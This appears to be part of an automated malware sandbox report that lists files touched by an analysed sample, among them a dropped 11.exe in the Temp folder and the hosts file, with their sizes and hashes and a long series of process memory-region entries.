SHA2566016fd3685046b33c7a2b1e785ac757df20e7c760abe0c27e1b8b0294222421d
SHA512ba4b5886c04ba8f7a7dbb87e96d639783a5969a245de181cf620b8f536e3ac95bbd910cd2f1f6aae6c3cd70fc1ef6209dc10d2b083ec51861b51d83f95811baa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\EntitiesFilesize
68KB
MD5d976a6a2df47aff5f7b6c91f8b11f0e8
SHA1332c9e8cf5b61aa1025372fdbe6fa282ee9604a2
SHA256cf839583b2b0430edd947eb02210e6a29dbdd3024bc94157f02a201308a91972
SHA512ef05f3d1b984563055f773a7458178c13e26af799e96d1eb26ecfe44ff4ef2adc8eb8aa3be926167cafe116a7eb1e189ef899a88d4c48a9093f90460a28128df
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\FingerprintingFilesize
1KB
MD59c7457097ea03210bdf62a42709d09d7
SHA11f71e668d7d82d6e07a0a4c5a5e236929fc181fc
SHA2569555aa7dc9216c969baf96676de9182692816d257cec8f49c5620225357c4967
SHA512e00b3b66e0999dd4b035183adf9f741ff14087085c5d2a240a16e5f25abf18c93454824cd3473c2f122914dab9920dec8163aafd9e3db19a27301d7f58a38b55
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\OtherFilesize
34B
MD5cd0395742b85e2b669eaec1d5f15b65b
SHA143c81d1c62fc7ff94f9364639c9a46a0747d122e
SHA2562b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707
SHA5124df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Mu\SocialFilesize
355B
MD5ec39f54d3e06add038f88fa50834f5cd
SHA1d75e83855e29d1bc776c0fe96dd2a0726bf6d3c4
SHA2560a48c92dcb63ddaf421f916fe6bb1c62813f256a4a06a4fe9f6df81e2a43e95b
SHA51291548200f6556f9872f87b8a244c03c98f8fc26be0c861127fcebaa504f31b7d72ef543d84db1ff7d3400bbd4500a1cb92d1b0b3a925378b8c56d526511d0d9b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\AdvertisingFilesize
917B
MD51f3b083260019eef6691121d5099d3e8
SHA144ffccd3293b17344816b76be4ede5a58ac7c9a5
SHA256ecdfa6251eab1b8928ca8d9cd8842f137c1ce241c7e9bbbc53474286b46d9600
SHA512ab5d9097fe90d596d69c33e0e51c155624027e05bb9c85eb0388b2acd86debbffcd2c1c58496875906c97ff3e8a7547040799a35f5277a12bfc4f60597c52c4a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\AnalyticsFilesize
91B
MD570e7fb4d4f0bfd58022da440f4ff670b
SHA11e3aeb8d627db63aa31f19a1d6ec1e33571f297e
SHA256e7be4221cf5029e817e664829ecb5e6d2d2fe785505214a8c00c75f86ac59808
SHA5126751d4a176a2e2394364f12c28506e6568b928d76f35c27529b7e0c8b0bff5941c2ead5036393a3b24846f5293b6e2a920505da7d125a1f374f9a68cce1318d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\ContentFilesize
36B
MD57f077f40c2d1ce8e95faa8fdb23ed8b4
SHA12c329e3e20ea559974ddcaabc2c7c22de81e7ad2
SHA256bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf
SHA512c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\CryptominingFilesize
32B
MD54ec1eda0e8a06238ff5bf88569964d59
SHA1a2e78944fcac34d89385487ccbbfa4d8f078d612
SHA256696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5
SHA512c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\EntitiesFilesize
9KB
MD5643a118f249a643d00a0e0ba251c2558
SHA15dbb890960534df2fb083bec1f5a5d3dbc83e47e
SHA2565dac8767cc89776637ba4888bd39b57044f6c12d35ed8ed8ecf717e3d1b39d66
SHA512a7f854a091540a83dccf4acf138c3443ce74025a3c3f24cb38bc41752b49924ddf4377afbfc901f38d7da395e2e83a0dce50fc45e8a6eb6a2a3f87163a183d6a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\FingerprintingFilesize
172B
MD596fd20998ace419a0c394dc95ad4318c
SHA153a0a2818989c3472b29cdb803ee97bb2104ce54
SHA256282a71ac3395f934ba446a3836c1f1466743f523a85186e74c44c1aef1b596c1
SHA512d59ed718eea906fc25f27e0efe0bfe45fa807ef7050b9c7065c076996885890837eb51579aa79d0121586aa9cecc292d4e1b1e6a7236dbafe90c5601d5401545
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\OtherFilesize
75B
MD5c6c7f3ee1e17acbff6ac22aa89b02e4e
SHA1bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b
SHA256a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4
SHA51286ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\SocialFilesize
2KB
MD537a70ee6ab90aa2fd3dd7416e76675a6
SHA1e57ff483f1085d428ec6e22159c1547a2b3d2718
SHA256c73e3c71829a98d11e48924e4df126e0c265f21b62b1aa7ac27033f7554abcb8
SHA512e335f6c350ed839911ef1b3cb9b2d12744b37a5bdfd5e7c1535c473d2383b2a5f1dacb5b341474732e9fbb46cc59db5bd371e6bc5dd785b1015d5aa42dcb3f3e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.23\Sigma\StagingFilesize
3KB
MD52e020f44ed4f057648d549c24ec82b15
SHA1d8e0bd6a321e1700c90a54f79dec6d26af7df438
SHA256c33bcaf2f4ff8a8da96d4b6d7493751c5bbbefaacb6a9737b77e3395f5007dfe
SHA51213748044eb4c2eb11011a2967451cabb97a56363b106abf3bf4e6b8ec9c6e71134b5610ba4d1f722c02b9f9d275bbff22468c64d27a6fcf2c9d8980d001ab79f
-
C:\Users\Admin\AppData\Local\Temp\11.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Temp\11.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
\??\pipe\LOCAL\crashpad_4192_YSEJPTNIMFTPNYKCMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1152-166-0x0000000000000000-mapping.dmp
-
memory/1348-174-0x0000000000000000-mapping.dmp
-
memory/1624-168-0x0000000000000000-mapping.dmp
-
memory/1628-175-0x0000000000000000-mapping.dmp
-
memory/2228-160-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/2228-190-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/2228-161-0x0000019132130000-0x000001913254E000-memory.dmpFilesize
4.1MB
-
memory/2272-157-0x0000000000000000-mapping.dmp
-
memory/2516-163-0x0000013461A60000-0x0000013461A82000-memory.dmpFilesize
136KB
-
memory/2516-162-0x0000000000000000-mapping.dmp
-
memory/2516-165-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/2516-164-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/3236-177-0x0000000000000000-mapping.dmp
-
memory/3504-172-0x0000000000000000-mapping.dmp
-
memory/3516-176-0x0000000000000000-mapping.dmp
-
memory/3672-169-0x0000000000000000-mapping.dmp
-
memory/3808-167-0x0000000000000000-mapping.dmp
-
memory/4192-155-0x0000000000000000-mapping.dmp
-
memory/4420-156-0x00007FFDE9E90000-0x00007FFDEA085000-memory.dmpFilesize
2.0MB
-
memory/4420-159-0x00007FFDE9E90000-0x00007FFDEA085000-memory.dmpFilesize
2.0MB
-
memory/4420-158-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/4420-154-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/4420-153-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/4420-150-0x0000000000000000-mapping.dmp
-
memory/4904-171-0x0000000000000000-mapping.dmp
-
memory/4988-170-0x0000000000000000-mapping.dmp
-
memory/5036-173-0x0000000000000000-mapping.dmp
-
memory/5144-178-0x0000000000000000-mapping.dmp
-
memory/5180-179-0x0000000000000000-mapping.dmp
-
memory/5232-180-0x0000000000000000-mapping.dmp
-
memory/5256-181-0x0000000000000000-mapping.dmp
-
memory/5284-182-0x0000000000000000-mapping.dmp
-
memory/5304-183-0x0000000000000000-mapping.dmp
-
memory/5332-184-0x0000000000000000-mapping.dmp
-
memory/5432-187-0x0000000000000000-mapping.dmp
-
memory/5456-188-0x0000000000000000-mapping.dmp
-
memory/5484-193-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/5484-215-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/5484-213-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/5728-192-0x0000000000000000-mapping.dmp
-
memory/5948-194-0x0000000000000000-mapping.dmp
-
memory/5968-195-0x0000000000000000-mapping.dmp
-
memory/5988-196-0x0000000000000000-mapping.dmp
-
memory/6008-197-0x0000000000000000-mapping.dmp
-
memory/6036-198-0x0000000000000000-mapping.dmp
-
memory/6064-199-0x0000000000000000-mapping.dmp
-
memory/6096-200-0x0000000000000000-mapping.dmp
-
memory/6116-201-0x0000000000000000-mapping.dmp
-
memory/6164-202-0x0000000000000000-mapping.dmp
-
memory/6192-203-0x0000000000000000-mapping.dmp
-
memory/6212-204-0x0000000000000000-mapping.dmp
-
memory/6312-206-0x0000000000000000-mapping.dmp
-
memory/6332-208-0x0000000000000000-mapping.dmp
-
memory/6484-210-0x0000000000000000-mapping.dmp
-
memory/6536-212-0x0000000000000000-mapping.dmp
-
memory/6688-220-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/6688-219-0x00007FFDE9E90000-0x00007FFDEA085000-memory.dmpFilesize
2.0MB
-
memory/6688-214-0x0000000000000000-mapping.dmp
-
memory/6688-216-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/6688-217-0x00007FFDE9E90000-0x00007FFDEA085000-memory.dmpFilesize
2.0MB
-
memory/6732-238-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6732-228-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6732-261-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6732-253-0x0000018D709E0000-0x0000018D709F2000-memory.dmpFilesize
72KB
-
memory/6748-224-0x0000000000000000-mapping.dmp
-
memory/6812-239-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6812-243-0x00000148E8310000-0x00000148E831A000-memory.dmpFilesize
40KB
-
memory/6812-236-0x00000148E82E0000-0x00000148E82FC000-memory.dmpFilesize
112KB
-
memory/6812-237-0x00000148E82C0000-0x00000148E82CA000-memory.dmpFilesize
40KB
-
memory/6812-240-0x00000148E8320000-0x00000148E833A000-memory.dmpFilesize
104KB
-
memory/6812-221-0x0000000000000000-mapping.dmp
-
memory/6812-235-0x00000148CE6D0000-0x00000148CE6DA000-memory.dmpFilesize
40KB
-
memory/6812-230-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6812-244-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/6812-231-0x00000148CE6E0000-0x00000148CE6FC000-memory.dmpFilesize
112KB
-
memory/6812-242-0x00000148E8300000-0x00000148E8306000-memory.dmpFilesize
24KB
-
memory/6812-241-0x00000148E82D0000-0x00000148E82D8000-memory.dmpFilesize
32KB
-
memory/6936-226-0x0000000000000000-mapping.dmp
-
memory/6952-229-0x0000000000000000-mapping.dmp
-
memory/7240-232-0x0000000000000000-mapping.dmp
-
memory/7288-233-0x0000000000000000-mapping.dmp
-
memory/7516-234-0x0000000000000000-mapping.dmp
-
memory/7812-245-0x0000000000000000-mapping.dmp
-
memory/7860-246-0x0000000000000000-mapping.dmp
-
memory/7932-247-0x0000000000000000-mapping.dmp
-
memory/7948-248-0x0000000000000000-mapping.dmp
-
memory/7960-249-0x0000000000000000-mapping.dmp
-
memory/7988-252-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/7988-251-0x000001E327320000-0x000001E327327000-memory.dmpFilesize
28KB
-
memory/7988-268-0x00007FFDCAC20000-0x00007FFDCB6E1000-memory.dmpFilesize
10.8MB
-
memory/7996-250-0x0000000000000000-mapping.dmp
-
memory/8084-254-0x0000000000000000-mapping.dmp
-
memory/8092-255-0x0000000000000000-mapping.dmp
-
memory/8120-260-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/8120-262-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/8120-264-0x0000000000E70000-0x0000000000E90000-memory.dmpFilesize
128KB
-
memory/8120-267-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/8120-269-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/8120-259-0x000000014036EAC4-mapping.dmp
-
memory/8120-258-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/8128-256-0x0000000000000000-mapping.dmp
-
memory/8136-257-0x0000000000000000-mapping.dmp
-
memory/8172-263-0x0000000000000000-mapping.dmp
-
memory/8180-265-0x0000000000000000-mapping.dmp
-
memory/8228-266-0x0000000000000000-mapping.dmp
-
memory/190436-149-0x00000000096B0000-0x0000000009BDC000-memory.dmpFilesize
5.2MB
-
memory/190436-143-0x0000000006D20000-0x00000000072C4000-memory.dmpFilesize
5.6MB
-
memory/190436-148-0x0000000007750000-0x0000000007912000-memory.dmpFilesize
1.8MB
-
memory/190436-147-0x0000000006C30000-0x0000000006C80000-memory.dmpFilesize
320KB
-
memory/190436-146-0x0000000006A00000-0x0000000006A1E000-memory.dmpFilesize
120KB
-
memory/190436-145-0x0000000006900000-0x0000000006976000-memory.dmpFilesize
472KB
-
memory/190436-144-0x0000000006860000-0x00000000068F2000-memory.dmpFilesize
584KB
-
memory/190436-132-0x0000000000000000-mapping.dmp
-
memory/190436-142-0x0000000005CE0000-0x0000000005D46000-memory.dmpFilesize
408KB
-
memory/190436-141-0x0000000005950000-0x000000000598C000-memory.dmpFilesize
240KB
-
memory/190436-140-0x0000000005A20000-0x0000000005B2A000-memory.dmpFilesize
1.0MB
-
memory/190436-139-0x00000000058F0000-0x0000000005902000-memory.dmpFilesize
72KB
-
memory/190436-138-0x0000000005E50000-0x0000000006468000-memory.dmpFilesize
6.1MB
-
memory/190436-133-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB